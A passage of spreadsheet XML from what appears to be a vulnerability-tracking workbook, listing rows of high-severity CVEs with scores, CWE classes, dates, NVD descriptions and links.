        <is>
          <t>CVE-2026-12651</t>
        </is>
      </c>
      <c r="C738" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E738" s="5" t="inlineStr"/>
      <c r="F738" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L738" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13622</t>
        </is>
      </c>
      <c r="C739" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E739" s="5" t="inlineStr"/>
      <c r="F739" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L739" s="5" t="inlineStr">
        <is>
          <t>A symlink following vulnerability was found in KubeVirt's virt-handler migration proxy. During live migration, virt-handler dials Unix sockets inside the target virt-launcher pod via /proc/&lt;pid&gt;/root/ paths using net.Dial() without symlink protection. These socket paths reside in qemu-owned directories writable by the virt-launcher user. An attacker with namespace edit and pods/exec permissions can replace a migration proxy socket with a symlink to the host CRI-O socket. Because virt-handler runs as root in the host mount namespace, absolute symlink targets resolve against the host filesystem, and the bidirectional io.Copy proxy relays attacker-controlled bytes to the container runtime, enabling full node compromise.</t>
        </is>
      </c>
      <c r="M739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13622</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13739</t>
        </is>
      </c>
      <c r="C740" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E740" s="5" t="inlineStr"/>
      <c r="F740" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="I740" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L740" s="5" t="inlineStr">
        <is>
          <t>A legacy endpoint in Command Center contained an unauthenticated server-side request forgery (SSRF) vulnerability related to the handling of arbitrary target URLs.  Software customers upgrade to resolved maintenance release.  Update Command Center.</t>
        </is>
      </c>
      <c r="M740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13739</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13761</t>
        </is>
      </c>
      <c r="C741" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E741" s="5" t="inlineStr"/>
      <c r="F741" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="inlineStr"/>
      <c r="I741" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr">
        <is>
          <t>CWE-606</t>
        </is>
      </c>
      <c r="L741" s="5" t="inlineStr">
        <is>
          <t>Pega Platform versions 7.1.0 through 25.1.2 are affected by an improper validation of inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.</t>
        </is>
      </c>
      <c r="M741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13761</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14359</t>
        </is>
      </c>
      <c r="C742" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E742" s="5" t="inlineStr"/>
      <c r="F742" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="inlineStr"/>
      <c r="I742" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L742" s="5" t="inlineStr">
        <is>
          <t>The YITH WooCommerce Waitlist Premium plugin for WordPress is vulnerable to Privilege Escalation in versions up to, and including, 3.35.0. This is due to the add_user_in_waiting_list() function registered on the wp_ajax_yith_wcwtl_add_user action being missing both a capability check and a nonce verification, and using parse_str() + extract() to import attacker-controlled variables from $_POST['params'] that are then passed to wp_create_user() and $user-&gt;set_role(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator by creating a new user account and assigning it the administrator role.</t>
        </is>
      </c>
      <c r="M742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14359</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14828</t>
        </is>
      </c>
      <c r="C743" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E743" s="5" t="inlineStr"/>
      <c r="F743" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="inlineStr"/>
      <c r="I743" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L743" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine Password Manager Pro versions before 13235, PAM360 versions before 8561, and Access Manager Plus versions before 4405 are vulnerable to an authenticated SQL Injection vulnerability.</t>
        </is>
      </c>
      <c r="M743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14828</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16101</t>
        </is>
      </c>
      <c r="C744" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E744" s="5" t="inlineStr"/>
      <c r="F744" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="inlineStr"/>
      <c r="I744" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L744" s="5" t="inlineStr">
        <is>
          <t>Spoofing an already bonded device can force either RS9116W or SiWx917 to re-pair/bond with a rogue device. See V1 in BLERP paper below</t>
        </is>
      </c>
      <c r="M744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16101</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16502</t>
        </is>
      </c>
      <c r="C745" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E745" s="5" t="inlineStr"/>
      <c r="F745" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="inlineStr"/>
      <c r="I745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr">
        <is>
          <t>The Live Composer – Free WordPress Website Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.18 via deserialization of untrusted input . This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.</t>
        </is>
      </c>
      <c r="M745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16745</t>
        </is>
      </c>
      <c r="C746" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E746" s="5" t="inlineStr"/>
      <c r="F746" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G746" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H746" s="5" t="inlineStr"/>
      <c r="I746" s="5" t="inlineStr">
        <is>
          <t>2026-07-23</t>
        </is>
      </c>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L746" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in odh-dashboard, the web console component of Red Hat OpenShift AI (RHOAI). Due to incorrect network binding, a malicious actor within the cluster can bypass authentication and impersonate any user by providing an arbitrary access token. This allows an attacker to gain unauthorized access to the Kubernetes API, potentially leading to arbitrary code execution, privilege escalation, or information disclosure.</t>
        </is>
      </c>
      <c r="M746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16745</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-1784</t>
        </is>
      </c>
      <c r="C747" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E747" s="5" t="inlineStr"/>
      <c r="F747" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I747" s="5" t="inlineStr">
        <is>
          <t>2026-06-02</t>
        </is>
      </c>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="L747" s="5" t="inlineStr">
        <is>
          <t>The Route OpenShift resource allows to define routes to make pods reachable at a subdomain through HAProxy. It was found that the checks performed on the spec.path YAML stanza in a Route document was insufficient and could allow a controlled injection of the HAProxy configuration.</t>
        </is>
      </c>
      <c r="M747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-1784</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18198</t>
        </is>
      </c>
      <c r="C748" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E748" s="5" t="inlineStr"/>
      <c r="F748" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="inlineStr"/>
      <c r="I748" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L748" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in TAC Information Services Internal and External Trade Inc. GOLDENHORN ONEIT allows Blind SQL Injection.
This issue affects GOLDENHORN ONEIT: before Göbeklitepe.</t>
        </is>
      </c>
      <c r="M748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18198</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18341</t>
        </is>
      </c>
      <c r="C749" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E749" s="5" t="inlineStr"/>
      <c r="F749" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G749" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H749" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I749" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J749" s="5" t="inlineStr"/>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to corrupt memory due to an integer underflow.</t>
        </is>
      </c>
      <c r="M749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18341</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18480</t>
        </is>
      </c>
      <c r="C750" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E750" s="5" t="inlineStr"/>
      <c r="F750" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="inlineStr"/>
      <c r="I750" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L750" s="5" t="inlineStr">
        <is>
          <t>The SureCart  WordPress plugin before 4.6.3 does not ensure that the account affected by a customer update is the same account its permission check authorised, allowing users with a subscriber-level account to change another user's email address, including an administrator's, and take over that account via a password reset. It further allows an attacker-controlled customer record to be associated with an arbitrary user, and discloses customer identifiers and email addresses to any authenticated user, which together make the takeover reachable from a subscriber-level account alone.</t>
        </is>
      </c>
      <c r="M750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18480</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18486</t>
        </is>
      </c>
      <c r="C751" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E751" s="5" t="inlineStr"/>
      <c r="F751" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G751" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H751" s="5" t="inlineStr"/>
      <c r="I751" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L751" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway &lt;= v1.0.7 MCP Context Forge could allow a remote authenticated attacker to obtain sensitive credentials and escalate privileges due to improper validation of jq filters.</t>
        </is>
      </c>
      <c r="M751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18486</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18617</t>
        </is>
      </c>
      <c r="C752" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E752" s="5" t="inlineStr"/>
      <c r="F752" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G752" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H752" s="5" t="inlineStr"/>
      <c r="I752" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="L752" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Data Science Pipelines Operator (DSPO). A namespace editor can exploit a vulnerability in the spec.database.customExtraParams field, which allows for the injection of dangerous parameters into the MySQL Data Source Name (DSN) string. By manipulating these parameters, an attacker can enable LOCAL INFILE functionality and exfiltrate sensitive files, such as the service account token, from the operator pod. This can lead to privilege escalation, allowing a namespace editor to gain cluster-admin privileges.</t>
        </is>
      </c>
      <c r="M752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18617</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18851</t>
        </is>
      </c>
      <c r="C753" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E753" s="5" t="inlineStr"/>
      <c r="F753" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="inlineStr">
        <is>
          <t>ivanti:endpoint_manager_mobile</t>
        </is>
      </c>
      <c r="I753" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L753" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t>
        </is>
      </c>
      <c r="M753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19291</t>
        </is>
      </c>
      <c r="C754" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E754" s="5" t="inlineStr"/>
      <c r="F754" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="inlineStr"/>
      <c r="I754" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L754" s="5" t="inlineStr">
        <is>
          <t>Bluetooth re-pairing with an existing device can use a lower security level. RS9116W and SiWx91x impacted. See V3 in the BLERP paper linked below.</t>
        </is>
      </c>
      <c r="M754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19291</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19292</t>
        </is>
      </c>
      <c r="C755" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E755" s="5" t="inlineStr"/>
      <c r="F755" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="inlineStr"/>
      <c r="I755" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="L755" s="5" t="inlineStr">
        <is>
          <t>Re-pairing with a legitimate device can use a lower security level than
previous making brute-forcing the LTK easier. See V4 in the BLERP paper linked below.</t>
        </is>
      </c>
      <c r="M755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19292</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19293</t>
        </is>
      </c>
      <c r="C756" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E756" s="5" t="inlineStr"/>
      <c r="F756" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="inlineStr"/>
      <c r="I756" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>CWE-521</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr">
        <is>
          <t>SMP security request (from peripheral) does not include the maximum
encryption key size supported. Using a key with less than the maximum keysize
makes brute-forcing the key easier. See V6 in BLERP paper linked below.</t>
        </is>
      </c>
      <c r="M756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19293</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19298</t>
        </is>
      </c>
      <c r="C757" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E757" s="5" t="inlineStr"/>
      <c r="F757" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G757" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H757" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I757" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to execute arbitrary code due to an authorization bypass in the flow build process.</t>
        </is>
      </c>
      <c r="M757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19298</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19546</t>
        </is>
      </c>
      <c r="C758" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E758" s="5" t="inlineStr"/>
      <c r="F758" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="inlineStr"/>
      <c r="I758" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in DBI. This is a fix for a partial fix for CVE-2026-14380 for RHEL 9.8.z and 10.2.z.
For a detailed Statement, Description and Mitigation please reffer to the original https://access.redhat.com/security/cve/cve-2026-19546.</t>
        </is>
      </c>
      <c r="M758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19546</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19633</t>
        </is>
      </c>
      <c r="C759" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E759" s="5" t="inlineStr"/>
      <c r="F759" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G759" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H759" s="5" t="inlineStr"/>
      <c r="I759" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability that allows unprivileged masked users to execute arbitrary code by abusing operators, domain casts, or view subqueries that carry untrusted expressions. When these objects are evaluated in the context of the extension’s masking mechanisms, the malicious code can run with elevated privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later versions</t>
        </is>
      </c>
      <c r="M759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19633</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19887</t>
        </is>
      </c>
      <c r="C760" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E760" s="5" t="inlineStr"/>
      <c r="F760" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="inlineStr"/>
      <c r="I760" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J760" s="5" t="inlineStr"/>
